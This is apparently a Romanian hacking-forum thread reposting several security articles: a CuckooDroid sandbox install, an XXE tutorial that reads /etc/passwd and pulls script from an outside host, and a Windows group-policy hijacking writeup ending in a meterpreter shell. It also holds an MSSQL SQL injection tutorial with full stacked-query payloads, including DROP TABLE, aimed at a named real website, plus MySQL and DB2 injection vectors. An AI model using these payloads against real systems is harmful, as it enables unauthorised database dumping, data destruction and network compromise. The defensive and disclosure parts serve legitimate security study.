Nytro

Nu va mai luati de fanul meu

CuckooDroid - Automated Android Malware Analysis. Contributed By Check Point Software Technologies LTD. CuckooDroid is an extension of Cuckoo Sandbox the Open Source software for automating analysis of suspicious files, CuckooDroid brigs to cuckoo the capabilities of execution and analysis of android application. Installation - Easy integration script: git config --global user.email "you@example.com" git config --global user.name "Your Name" git clone --depth=1 https://github.com/cuckoobox/cuckoo.git cuckoo cd cuckoo git remote add droid https://github.com/idanr1986/cuckoo-droid git pull --no-edit -s recursive -X theirs droid master cat conf-extra/processing.conf >> conf/processing.conf cat conf-extra/reporting.conf >> conf/reporting.conf rm -r conf-extra echo "protobuf" >> requirements.txt Documentation CuckooDroid - CuckooDroid Book — CuckooDroid v1.0 Book Cuckoo Sandbox - Cuckoo Sandbox Book — Cuckoo Sandbox v1.2 Book You are advised to read the Cuckoo Sandbox documentation before using CuckooDroid! Powered by: Androguard -> https://code.google.com/p/androguard/ Google Play Unofficial Python API -> https://github.com/egirault/googleplay-api C redit botherder for linux_analyzer_dev -> https://github.com/cuckoobox/cuckoo/tree/linux_analyzer_dev Authors Idan Revivo - idanr@checkpoint.com (twitter: idanr86) Ofer Caspi oferc@checkpoint.com (twitter: @shablolForce) Sursa: https://github.com/idanr1986/cuckoo-droid

XML External Entity attack (XXE) in a Nutshell Posted on April 3, 2015 by chs The XXE attack has been around for a few years, but hasn’t gotten much attention until the last couple of years with some high-profile cases in Facebook and PayPal. So, what is the XML External Entity attack? XXE is an abbreviation for XML External Entity. It is a part of the XML spec that allows a document to have entities that resolve to someplace external (not within the same document). Some examples probably describe it best. For example, let’s say that we have a web app that takes as input an xml file and displays it in a table. Example 1 Here’s a sample input file- [TABLE=width: 633] [TR] [TD=class: line_numbers]1 2 3 4 5 6 7 8 9 10 11 12 13[/TD] [TD=class: code]<?xml version="1.0" encoding="utf-8"?> <contacts> <contact> <login>bobw</login> <name>Bob Walker</name> <email>bob@bob.com</email> </contact> <contact> <login>ajones</login> <name>Alice Jones</name> <email>alice@alice.com</email> </contact> </contacts>[/TD] [/TR] [/TABLE] This is processed and displays the following- [TABLE=width: 639] [TR] [TH]login[/TH] [TH]name[/TH] [TH]email[/TH] [/TR] [TR] [TD]bobw[/TD] [TD]Bob Walker[/TD] [TD]bob@bob.com[/TD] [/TR] [TR] [TD]ajones[/TD] [TD]Alice Jones[/TD] [TD]alice@alice.com[/TD] [/TR] [/TABLE] Pretty Straightforward, right? Example 2 Now, let’s take the same example and add an entity- [TABLE=width: 633] [TR] [TD=class: line_numbers]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16[/TD] [TD=class: code]<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY foo "Foo"> ]> <contacts> <contact> <login>&foo;</login> <name>Bob Walker</name> <email>bob@bob.com</email> </contact> <contact> <login>ajones</login> <name>Alice Jones</name> <email>alice@alice.com</email> </contact> </contacts>[/TD] [/TR] [/TABLE] This processes and displays- [TABLE=width: 639] [TR] [TH]login[/TH] [TH]name[/TH] [TH]email[/TH] [/TR] [TR] [TD]Foo[/TD] [TD]Bob Walker[/TD] [TD]bob@bob.com[/TD] [/TR] [TR] [TD]ajones[/TD] [TD]Alice Jones[/TD] [TD]alice@alice.com[/TD] [/TR] [/TABLE] What happened? On line 3 of the xml file we created an entity called foo which is the string, “Foo”. We then use that entity, &foo, in place of Bob’s username on line 7. While processing the document the parser substituted “Foo” when it saw &foo;. Example 3Now let’s do something really interesting. Consider the following- [TABLE=width: 633] [TR] [TD=class: line_numbers]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16[/TD] [TD=class: code]<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY foo SYSTEM "file:///etc/passwd"> ]> <contacts> <contact> <login>&foo;</login> <name>Bob Walker</name> <email>bob@bob.com</email> </contact> <contact> <login>ajones</login> <name>Alice Jones</name> <email>alice@alice.com</email> </contact> </contacts>[/TD] [/TR] [/TABLE] This processes and displays- [TABLE=width: 639] [TR] [TH]login[/TH] [TH]name[/TH] [TH]email[/TH] [/TR] [TR] [TD]root:X:0:0:root:/root:/bin/bash <redacted>[/TD] [TD]Bob Walker[/TD] [TD]bob@bob.com[/TD] [/TR] [TR] [TD]ajones[/TD] [TD]Alice Jones[/TD] [TD]alice@alice.com[/TD] [/TR] [/TABLE] What did it do? On line 3, the keyword SYSTEM means that this entity reference is external to the document. In this case, the external entity references /etc/passwd on the system that is processing the xml. This causes the contents of /etc/passwd to be pulled into the document and then displayed. Example 4 Up to this point, the attacks have been against the server. How can we attack the user? Consider this- [TABLE=width: 633] [TR] [TD=class: line_numbers]1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16[/TD] [TD=class: code]<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY foo SYSTEM "http://www.bitbucket.me/log/xss.php"> ]> <contacts> <contact> <login>&foo;</login> <name>Bob Walker</name> <email>bob@bob.com</email> </contact> <contact> <login>ajones</login> <name>Alice Jones</name> <email>alice@alice.com</email> </contact> </contacts>[/TD] [/TR] [/TABLE] What do you think the external entity reference does here? It returns <script>alert(‘xss’)</script>. When the table displays that script is executed in the browser. (I’m not displaying the results like in previous examples because it would execute while you are reading this and it’s just an example showing that it’s vulnerable.). I hope these examples give you a basic understanding of what the XXE vulnerability is. Next week I’ll talk about how to prevent it. Sursa: XML External Entity attack (XXE) in a Nutshell - Geeky Thoughts

"In this case, we can specify a meterpreter DLL payload using a UNC path on an SMB server we control and then next time a new process starts we will get a shell." Adica il ia de pe un share. Prin SMB. La runtime. Ex. \\10.0.13.37\metsrv.dll

Nu e. Isi face in continuare treaba. 7.1a.

How to own any windows network with group policy hijacking attacks Author: Luke Jennings For those of you that didn’t make it to SyScan ‘15 last week, this is a blog post version of the presentation I gave about the vulnerabilities I found in group policy that resulted in Microsoft releasing MS15-011 and MS15-014 in February. These bulletins resolve issues in Microsoft’s group policy engine that allow remote code execution at SYSTEM level if an attacker can intercept network traffic from a domain-joined system. The full process leading up to their discovery, along with exploitation details and accompanying video demonstrations, will be given. Additionally, the new security controls introduced by Microsoft will be discussed to assess how effective they are, show what attack scenarios they mitigate and which ones they do not. Finally, some additional guidance will be given on other mitigating controls that can provide additional protection will be discussed. How does group policy work? Group policy is Microsoft’s core infrastructure for managing the configuration of both users and computers in an enterprise windows forest. Configuration settings can be grouped into group policy objects (GPOs) and these can be linked to various physical and logical groupings of computers and/or users. Alongside Microsoft Office, it is arguably the defining reason that Microsoft still dominate the business endpoint market. Some of its key selling points are summarised below: Allows highly flexible, centralised machine and user configuration over global enterprise networks Smart redundancy, designed to handle many sites/offices distributed over a global WAN It is key to enforcing security critical configuration settings across an enterprise In a windows domain, there are domain members and domain controllers. Domain controllers store all GPOs and domain members communicate with domain controllers in order to determine which GPOs are relevant to them and to fetch the GPOs themselves. At a high level, there are four key services that allow this to happen: DNS – Used to find the nearest domain controller RPC – Used to establish a secure channel with the domain controller make various RPC calls LDAP – Used to query the high level group policy configuration and which GPOs should be apply SMB – Used to get the full GPO content for each applicable GPO There are a huge number of configurable settings that can be set via group policy but the wealth of these end up as enforced registry changes on the endpoint. However, some notable exceptions to this are those that involve user accounts or group membership changes and file creation/modification. Different settings fall within different client side extensions (CSEs) and these CSEs will only be enforced on the client side if it has been indicated via LDAP that the relevant CSE is applicable for any given GPO. There are a large number of CSEs but some examples include security settings, registry settings, user accounts/groups, internet explorer zones etc. How can it be attacked? First we will cover the situation prior to February 2015 (when MS15-011 and MS15-014 were released in response to these attacks) and look at what attack scenarios apply and how they could be exploited. The first important point to understand is that the sheer control group policy affords over system configuration means that if you can control group policy then you effectively have full SYSTEM equivalent control over the systems under it. Beyond that, we need to understand that each of the four key steps outlined earlier need to complete successfully in turn for the next one to begin. For example, if the RPC stage fails then we won’t reach the LDAP stage and so any attacks focused on later stages need to ensure the earlier stages complete. The focus of this post is on the latter two protocol stages of the group policy update process, LDAP and SMB. These are the most interesting from a security perspective because LDAP is used to specify which GPOs and CSEs should apply to a host and SMB is used to fetch the individual GPOs including all the detailed configuration changes they contain. Control over either of these stages would give us significant control over the domain member that is fetching group policy. So what security controls are in place to protect LDAP and SMB communications? Well the key concern here is that the domain member verifies the identity of the domain controller to ensure it is a getting its group policy from a legitimate source and that integrity protection is in place to ensure the data can not be tampered with in transit. These are principally handled via authentication within the protocols plus integrity protection in the form of LDAP signing and SMB signing. We will focus on SMB from this point forward as this would give the most flexible control over individual configuration options due to it being used to fetch the individual GPOs themselves. There are configurable settings in group policy for controlling security critical options related to SMB signing. An excerpt of the “default domain controllers” policy is given below: As you can see, the default behaviour for domain controllers is to require SMB signing. This is a good control to have in place as we would not want SMB connections pulling down GPO information from domain controllers without integrity protection in place. This was alluded to in one of Microsoft’s technet articles from back in 2010 with the following quote: “SMB signing is available in all currently supported versions of Windows, but it’s only enabled by default on Domain Controllers. This is recommended for Domain Controllers because SMB is the protocol used by clients to download Group Policy information. SMB signing provides a way to ensure that the client is receiving genuine Group Policy.” However, that does not paint the full picture as it tells us nothing about the client. The relevant group policy options for specifying SMB signing on the client side are not specified in the “default domain policy”, which is applied to all domain members. Consequently, we need to look at what the default local configuration is. An excerpt of this showing the relevant settings is given below: As can be seen, SMB signing is not set to be a requirement on the client side. This means that domain members acting as an SMB client will negotiate SMB signing but will not require it if it is not supported. Defeating SMB Server Signing If the domain member does not require SMB signing but the domain controller requires SMB signing then how do we attack it? If we were in a position intercepting network traffic then we could either allow signing to be negotiated and then the connection would go on fine but be protected or we could prevent signing from being negotiated but the server would terminate the connection. However, we can avoid the domain controller SMB service altogether to eliminate the problem. The key points outlining this are given below: We allow DNS, RPC and LDAP traffic to all pass through from the domain member to the domain controller unhindered We redirect SMB traffic to our own malicious SMB server via NATing rules or similar The “real” SMB service on the domain controller is never involved so we can force SMB signing to be disabled on our own malicious SMB server The domain member SMB client happily negotiates no signing and carries on with unprotected SMB communications talking to a malicious server The diagram below gives an idea of how this attack would work in practice using ARP spoofing as the example traffic interception technique: Getting a shell What we have discussed so far is nice in theory but how do we practically exploit it to get a shell on the target system in practice? We could define login scripts, we could define new user accounts or abuse other settings to gain control. However, we need to remember that only the CSEs indicated to be active for a given GPO during the LDAP phase will be applied. The CSE for user management may not be in use, login scripts may not be in use and may not get us privileged access anyway etc and so our ideal exploitation technique would depend only on CSEs in use by default and on options that would get us SYSTEM-level access. It turns out that the security settings CSE is applied by default and allows us to control arbitrary registry settings. If we make use of the GPO section for this and define our own custom registry settings then we have full control over the registry on the domain member, which is very powerful. There are various ways we could use this to get code execution such as defining “Run” keys, creating new services, defining new authentication providers etc. However, during my testing I settled on AppInit DLLs for a proof of concept. AppInit DLLs are DLLs that are loaded into any process when it starts. My reason for choosing these was that no matter what, even on an inactive, untouched server that does not reboot, sooner or later a new process will be created in the background and load our DLL and there are also likely ways we can trigger a new process easily anyway. In this case, we can specify a meterpreter DLL payload using a UNC path on an SMB server we control and then next time a new process starts we will get a shell. If the system is running RDP then we can use rdesktop to connect, which will spawn a new winlogon.exe process as SYSTEM, loading our DLL payload and giving us a meterpreter shell as SYSTEM instantly. We will see a video of this exploit in action later but for now we will move on to considering a more secure configuration. (Breaking) Secure Configuration So at this point we have seen that the default configuration of a domain is vulnerable to man-in-the-middle (MITM) attacks against SMB when domain members fetch group policy. This is the basis of what eventually became MS15-011. However, this is due to a poor default configuration that can be resolved. What happens when you upgrade the configuration such that SMB signing is required by the clients? In this instance, I found a direct security control bypass vulnerability. I found that it was possible to deliberately corrupt the SMB communications when the security settings were being fetched, such that SMB signing would fail and the connection would be terminated. Now intuition would say that due to the failed application of group policy, the domain member would just remain at its existing configuration. However, it turned out that this was not the case and that as a product of the failure the group policy engine on the domain member would revert back to default configuration. Since the default local configuration does not require SMB signing, the domain member would revert itself back to an insecure state and then the original attack would apply as a second stage on the next group policy refresh. This is what became MS15-014. Hardened Configuration Exploit Process Now we will summarise the full exploit process for exploiting a hardened environment, along with an exploit video to demonstrate it: ARP spoof domain member and domain controller Allow all protocols to pass through fine (DNS, RPC, LDAP and SMB) Wait until the security settings response comes back via SMB Corrupt the response to cause the domain member SMB signing requirement to revert Modifying our NAT rules to redirect future SMB traffic to our own malicious SMB server Domain member will then fetch security settings containing our malicious AppInit DLL settings We make an unauthenticated RDP connection to the domain member to trigger a new SYSTEM winlogon.exe process Our handler receives a new meterpreter shell running as SYSTEM The following video demonstrates this exploit in action exploiting both MS15-011 and MS15-014 in a staged attack to compromise hardened environments: User vs Machine Attacks Group policy contains separate settings for computers and users. Computer settings will always apply to the computer itself but user settings will apply depending on the user that logs on. Until now we have only really been considering computer settings. After discovering the previous two attacks, I considered what would be possible if they were fixed by Microsoft and that a network was configured securely and so I began looking at SMB signing in more detail. In the case of NTLM authentication, SMB signing uses a key derived from the password of the user account used for authentication. The interesting finding I made here was that, whilst the machine settings use the machine account to access SMB, the user settings actually use the user’s account. Machine accounts by default use secure, randomly generated passwords and so we should not expect to be able to acquire or crack this password without already having gained SYSTEM access in the first place. This makes it a sensible account to be used as the basis of fetching group policy updates and should make the SMB signing mechanism strong. However, an ordinary user account may have a weak password or we may have discovered it through other means e.g. social engineering. In a privilege escalation scenario, it may even be our own account that is a low privileged domain account without any administrative control over domain members that it can login to. The key point here though is that if we know the password of a user logging into a system that we can intercept network traffic for then we can calculate SMB signatures correctly when user settings are fetched and so we can control the user settings part of group policy applied when they login. The question then becomes whether this poses a problem or not. What is the real impact of controlling user settings for group policy? Well in order to exploit the issue we need to know the user’s password and so intuition would say it would not represent an issue as controlling a user’s own configuration is redundant when we already have access to everything they do anyway. However, it turns out that despite being “user” settings, they are actually a lot more powerful than that. There are CSEs for them that include the ability to add new user accounts or define arbitrary registry keys including within the SYSTEM hive and therefore controlling user settings can still be used to gain SYSTEM access on a domain member. The implication of this is that if you know the password for a low privileged user account logging in to a system that you can intercept network traffic for then you can use that to gain SYSTEM privileges. There are probably two primary scenarios that this attack would apply to: You have a low privileged account and can use it to login interactively to physical workstations or virtual desktop farms that you can intercept network traffic for. In this instance you could escalate your privileges on them to SYSTEM. You are intercepting traffic on a large subnet full of laptop/desktop users and you know the passwords for a small number of uninteresting, low privileged users. However, you can use this knowledge to get full SYSTEM access to their endpoints, which may prove much more valuable to you. The following video demonstrates exploitation of this issue: Microsoft’s Response – MS15-011 and MS15-014 In February 2015, Microsoft introduced two security bulletins to address the vulnerabilities I reported. MS15-011 was not a bug fix but instead introduced an entire new configurable security control set known as “hardened UNC paths”, designed explicitly to thwart these types of attacks and more. They provide much more flexible and secure configuration over what happens when a UNC path is accessed than could be achieved previously. It is now possible to specify on a per-UNC path basis (with optional wildcards) what the security requirements for the connection are. Windows will then ensure it picks a transport mechanism that can meet those and ensures they are applied. Microsoft then give two recommended rules to configure as a minimum in a domain environment to protect against the attacks outlined before. These are shown below and essentially state that if the NETLOGON or SYSVOL shares are accessed on any domain controller that the OS should ensure it uses a transport and authentication method that allows mutual authentication and integrity protection and that those controls are enforced. This is actually further than I expected Microsoft to go and is a welcome step forward as they could have other potentially useful applications too. The Microsoft recommended settings shown above will also effectively disallow NTLM as an authentication mechanism for group policy updates as it does not strictly allow mutual authentication and so it will enforce kerberos use in general. This new security control when combined with the configuration above successfully protects against the first attack we outlined. In contrast, MS15-014 was a straight bug fix. There are no new security controls to configure here, it simply prevents the group policy processing engine from reverting back to the default local configuration when it encounters a failure during the retrieval of the security settings, which is intended to prevent the second attack we considered. I tested my original exploit against the patched version and sure enough the SMB signing settings remained in a secure state and so it seems this patch is effective. What happened to “User settings” post-patch? Microsoft are certainly aware of this exploit scenario as it was one of the three issues I originally reported but it was also the one I most felt may end up being “by design”. Nothing in the security bulletins for MS15-011 or MS15-014 specifically mention this issue and it is not immediately obvious how hardened UNC paths would resolve this issue. My testing revealed that the user account was still used for authentication when fetching user settings, not the machine account, meaning the underlying issue is still there. So the question is does this exploit scenario still apply? Our previous exploit technique redirected the SMB traffic to our own malicious SMB server, where we also had a user configured with the same username and password. The domain member would negotiate SMB signing and use NTLM authentication and our server would know how to calculate the signature because it would know the password of the user account, which is used to derive the signing key. However, with properly configured hardened UNC paths, the mutual authentication requirement means NTLM will not be used and kerberos will be enforced. How does this change the scenario? Decrypting Kerberos Packets We won’t be able to use the same exploit technique as before if kerberos is in use. Our malicious SMB server will not be able to authenticate itself to the domain member as it will not have the necessary keys to decrypt the service tickets that the domain member will supply to it. Additionally, the SMB signing keys are not a simple derivation of the user password when kerberos is used, they are generated by the SMB server and returned encrypted with the shared service key between the domain member and SMB server such that the domain member knows the signing key too. So is this an effective control? To understand that, we need to consider how a kerberos exchange works. The following diagram gives a simplified view of the process involved when a domain member wants to access the SMB service on a domain controller: The AS-REP (step 2) response contains a session key encrypted with a key derived from the user’s password. If we are monitoring kerberos packets and know the user’s password then we can decrypt this. The TGS-REP response (step 4) then contains a service key encrypted with the session key from before. If we have been keeping track of decrypted session keys then we will be able to decrypt this too. Finally, the AP-REP response (step 6) contains a sub key (used for SMB signing) encrypted with the service key from the TGS-REP response. If we have been monitoring and decrypting all the correct packets then we should be able to decrypt this sub key too. If we can eventually derive this sub key then we have everything we need to make arbitrary modifications to SMB packets and recalculate the signatures. Therefore, it seems the user settings exploit scenario still applies. To summarise, the following key steps apply in a post-patch, securely configured hardened UNC paths world: We monitor all kerberos exchanges and decrypt all AS-REP packets encrypted with user passwords we know to obtain session keys We decrypt any TGS-REP packets we can with the session keys we have collected to obtain service keys We decrypt any AP-REP packets we can with the service keys we have collected We use the sub keys we have obtained to make malicious changes to group policy information in SMB read responses and dynamically recalculate the SMB signatures on the fly We get our SYSTEM shells The following video demonstrates this issue being exploited on a patched system with securely configured hardened UNC paths. One important caveat to mention at this stage is that user settings are a bit less flexible than computer settings. Earlier we discussed how we used the security settings CSE for exploitation as this CSE would always apply no matter what was configured for a GPO and are forcibly re-applied periodically too. With user settings, we don’t have the same level of power by default unless certain more interesting CSEs are configured. In the exploit video above I had specifically configured a registry setting in the user settings GPO of the default domain policy such that the CSE for that applied and then my exploit modified the contents of the resulting XML file that was retrieved in order to inject a malicious AppInit DLL setting. In the default case though, this CSE would not be configured. However, something we have not looked at in much detail yet is LDAP. I mentioned previously that it is used to obtain the GPOs that should apply to a system or user (uniquely identified by GUIDs) along with which CSEs are enabled for them and then SMB is used to retrieve the detailed GPO settings for each of these. When user settings are fetched, the user account (rather than the machine account) is also used to authenticate to LDAP using kerberos. Consequently, a very similar process to before is conducted to negotiate a signing key for LDAP. By monitoring and decrypting kerberos packets, we should be able to derive this key in the same way and make arbitrary changes to the LDAP packets. This would mean that we could specify to enable whatever CSEs we are interested in using for our exploit and as such ensure that we can exploit this issue in the default case. Whilst I haven’t got as far as writing the code to verify this 100%, there is no reason why this should not work in exactly the same way as the SMB dynamic signature recalculation demonstrated practically in the video above. Alternative security controls All of these attacks are MITM attacks and so generally rely upon traffic interception techniques in order to conduct them. The most common and viable of these are layer 2 based, such as ARP spoofing, which is what was used in all exploit demonstrations above. There are a range of standard prevention and detection techniques for the various traffic interception attacks out there that are well worth investigating to provide additional protection against the attacks outlined in this blog post, as well as a range of other attacks that are dependent on traffic interception. Conclusion This concludes a pretty long and complicated blog post but I hope it has been interesting. Below, I’ll summarise some of the key take home points from all of this: Prior to February 2015, all enterprise windows networks were vulnerable to MITM attacks that would allow an unauthenticated attacker to gain SYSTEM privileges on any domain member. All versions of windows from XP/2003 to 8.1/2012R2 were vulnerable. MS15-011 and MS15-014 introduced new security features and bug fixes to protect against these attacks in the form of a new security control called “hardened UNC paths”. Microsoft have no intention of fixing XP/2003 and so these OS versions remain vulnerable. Vista/2008 onwards are still vulnerable in their default state as hardened UNC paths are not default. You need to configure them explicitly to Microsoft’s recommended configuration and apply it across your entire estate using group policy. Even on Vista/2008 onwards, user settings group policy can be exploited if you know a user’s password to conduct a form of privilege escalation to gain SYSTEM on domain members. Microsoft have shown no intention thus far of providing a control to protect against this. All exploit scenarios rely on MITM attacks and so existing controls to prevent and detect traffic interception attacks are a good way to provide additional protection against these issues. This is particularly important for XP/2003, which Microsoft have not patched, or if you are particularly concerned about the user settings related privilege escalation style attacks, for which Microsoft have provided no direct protection. Sursa: https://labs.mwrinfosecurity.com/blog/2015/04/02/how-to-own-any-windows-network-with-group-policy-hijacking-attacks/

Mda, se vede nasol postul, mergeti la link-ul original: https://rdot.org/forum/showthread.php?t=3251

In the Name of ALLAH the Most Beneficent and the Merciful Zenodermus, Ch3rn0by1 and Me was workinn on MSSQL.. when Zenodermus thought to make a DIOS for MSSQL.. previously at ???: The SQL Injection Knowledge Base DIOS is under the heading Retrieving Multiple Tables and Columns ???: AND 1=0; BEGIN DECLARE @xy varchar(8000) SET @xy=':' SELECT @xy=@xy+' '+name FROM sysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END; but thats output is like table1:column1 table1:column2 table1:column3 table2:column1 table2:column2 table2:column3 table3:column1 and so on.. but after adding some cosmetics to this query.. by Zenodermus.. it became Cool like this u can see in this pic.. but due to Character limit in available dataype VARCHAR(8000) we cannot see the complete output(mean all tables and columns).. jux because each time table is written with each column.. so we decided to make it more cool and tried to display all data.. mean complete tables and columns list.. and later after surfing on MSDN, Google and MSSQL documentation we came to know.. that actual length of varchar(MAX) or varchar(8000) is not 8000 it is 4000 even when u declare it MAX or 8000 and than it became our obsession to make it.. and now our final query output is.. like this.. well before Going into this you must know about Stacked Queries.. i will recommend to read the complete article at Stacked Queries - SQL Injection Attacks and in simple words.. With Stacked Queries we can Execute multiple statements in the same query to extend the possibilities of SQL injections eg.. SELECT * FROM products WHERE productid=1; drop table admin realistic example.. Salesforce1*Platform: Trusted Application Development Platform - Salesforce.com Drop table admin-- - and STACKED QUERY SUPPORT. ???: MySQL/PHP - Not supported (supported by MySQL for other API). SQL Server/Any API - Supported. Oracle/Any API - Not supported. Our Final Query is.. BEGIN DECLARE @data VARCHAR(8000), @counter int, @tblName VARCHAR(50), @colNames VARCHAR(100) DECLARE @TMPTbl TABLE (name VARCHAR(8000) NOT NULL) SET @counter = 1 SET @data = 'injected by rummykhan :: '+ @@VERSION +' Database :: '+ DB_NAME() SET @tblName = '' SET @colNames = '' WHILE @counter<=(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES) BEGIN SET @colNames = '' SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @TMPTbl) SELECT @colNames = @colNames + column_name +' : ' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @tblName INSERT @TMPTbl VALUES(@tblName) SET @data = @data + 'Table : '+ @tblName +' Columns : '+ @colNames SET @counter = @counter + 1 END SELECT @data AS output INTO Challenge END Well This Query looks horible but it actually is not.. Lets go deep into this Query... with BEGIN and END we declare a Batch/Group of statements to b executed togather.. next step is declaring supporting variables for holding table_name, column_name, a counter, one variable that can hold all table_names and column_names and one table with one column which will be acting as a collection which will be used to hold all the tables names.. will explain its use later next step is initializing declared variables.. we cannot use these un-initialized variables in SELECT statement.. thats why these are initialized with empty strings.. and @data with database version and database for further display in output.. next step is WHILE Loop this statement WHILE @counter<=(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES) will bound this loop to run through all tables.. at next step @colNames is re initialized with empty string everytime to hold the coloums of Only One table at a time.. next step is getting a table_name into @tblName and getting column_name for that table into @colNames and adding values of both @tblName and @colNames into @data Now explaining this part SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @TMPTbl) with this Query SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME only one table will be fetched.. To get next table in next iteration we used NOT IN Clause.. but NOT IN Clause need a collection for which we declared a TABLE @TMPTbl with a COLUMN named name for first time @TMPTbl will b empty so first table_name will b retrieved in @tblName and here in this part.. INSERT @TMPTbl VALUES(@tblName) each time @tblName value will b inserted in @TMPTbl and when it will goto this line again SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @TMPTbl) next table will b retrieved from this statement and so on... as @TMPTbl have first table_name now.. and so on.. when the loop will end.. all tables and columns will be added in @data.. and than with this statement SELECT @data AS output INTO Challenge we can store all @data into new table Challenge to use it in the query http://site.com/page.aspx?id=1;BEGIN DECLARE @data VARCHAR(8000), @counter int, @tblName VARCHAR(50), @colNames VARCHAR(100) DECLARE @TMPTbl TABLE (name VARCHAR(8000) NOT NULL) SET @counter = 1 SET @data = +'injected by rummykhan :: '+ @@VERSION +' Database :: '+ DB_NAME() SET @tblName = '' SET @colNames = '' WHILE @counter<=(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES) BEGIN SET @colNames = '' SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @TMPTbl) SELECT @colNames = @colNames + column_name +' : ' FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @tblName INSERT @TMPTbl VALUES(@tblName) SET @data = @data + 'Table : '+ @tblName +' Columns : '+ @colNames SET @counter = @counter + 1 END SELECT @data AS output INTO Challenge END-- - now change + with %2b becuase + is taken as space when sent from URL for the Challenge site our final query will be like http://www.uwdmaindia.org/EventDetails.aspx?ID=3';BEGIN DECLARE @data VARCHAR(8000), @counter int, @tblName VARCHAR(50), @colNames VARCHAR(100) DECLARE @TMPTbl TABLE (name VARCHAR(8000) NOT NULL) SET @counter = 1 SET @data=' injected by rummykhan :: '%2b@@version%2b'<br/>'%2bdb_name() SET @tblName = '' SET @colNames = '' WHILE @counter<=(SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES) BEGIN SET @colNames = '' SELECT @tblName = table_name FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (select name from @TMPTbl) SELECT @colNames = @colNames %2b' : '%2bcolumn_name FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = @tblName INSERT @TMPTbl VALUES(@tblName) SET @data=@data%2b'<br/><br/>Table : '%2b@tblName%2b'<br/>Columns : '%2b@colNames%2b'<br/>' SET @counter = @counter %2b 1 END SELECT @data AS output INTO Challenge END-- - and now the final part of the Challenge.. and STEP 2 how to see the output on web page.. http://site.com/page.aspx?id=-1 union select 1,2,3,output,5 from Challenge-- - and in Challenge Case.. http://www.uwdmaindia.org/EventDetails.aspx?ID=0' union all select 1,2,3,4,5,output,7,8 from Challenge-- - running first query multiple time will result in error that an object of Challenge already exist.. so dont forget to drop that table after running the query first time.. http://www.uwdmaindia.org/EventDetails.aspx?ID=0'; DROP TABLE Challenge-- - and in some cases where System.Web.HttpException is enabled there.. it take HTML tags as dangerous requests so i changed these to MSSQL CHAR() .. and Now this will work fine in almost every scenario.. and variable names are also shortened reason is same System.Web.HttpException of ASP.Net cannot parse long query.. ;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @mytbl table (name varchar(8000) not null) SET @y=1 SET @x='injected by rummykhan :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @mytbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @mytbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Chall1 END-- - author of this DIOS : Zenodermus & rummykhan thanx a lot for reading this lengthy tutorials.. but i think this deserve ur time.. because it is entirely a new thing in MSSQL.. there was no DIOS existing of this much completeness.. Happy Injecting Greetz : Ch3rn0by1 : Lafangoo : Connecting : exploiter-z : PMH~Str!k3r : Gujjar(PCP) : MakMan : madcodE : Ajkaro : Blackhawk : benzi : t.Pro : h4x0r : Sho0Ter Sursa: https://rdot.org/forum/showthread.php?t=3251

New error-based SQL Injection vectors in MySQL >= 5.7.5 1. ST_LatFromGeoHash() mysql> select ST_LatFromGeoHash(version()); ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-m16-log' for function ST_LATFROMGEOHASH 2. ST_LongFromGeoHash() mysql> select ST_LongFromGeoHash(version()); ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-m16-log' for function ST_LONGFROMGEOHASH 3. ST_PointFromGeoHash() mysql> select ST_PointFromGeoHash(version(),0); ERROR 1411 (HY000): Incorrect geohash value: '5.7.6-m16-log' for function st_pointfromgeohash Posted by dsrbr at 8:36 PM Sursa: http://dsrbr.blogspot.ru/

Fast exploitation method of SQL Injection in IBM DB2 1. listagg select * from news where id=-1 union select null,listagg(login||chr(58)||pass,chr(44)) from users (In the first example I use cast function only for good formatted output, but in the second and the third examples cast function is needed for the type conversion) 2. xmlgroup select * from news where id=-1 union select null,cast(xml2clob(xmlgroup(login,pass)) as varchar(180)) from users 3. xmlagg select * from news where id=-1 union select null,cast(xml2clob(xmlagg(xmlrow(login,pass))) as varchar(180)) from users Posted by dsrbr at 10:02 AM Sursa: http://dsrbr.blogspot.ru/

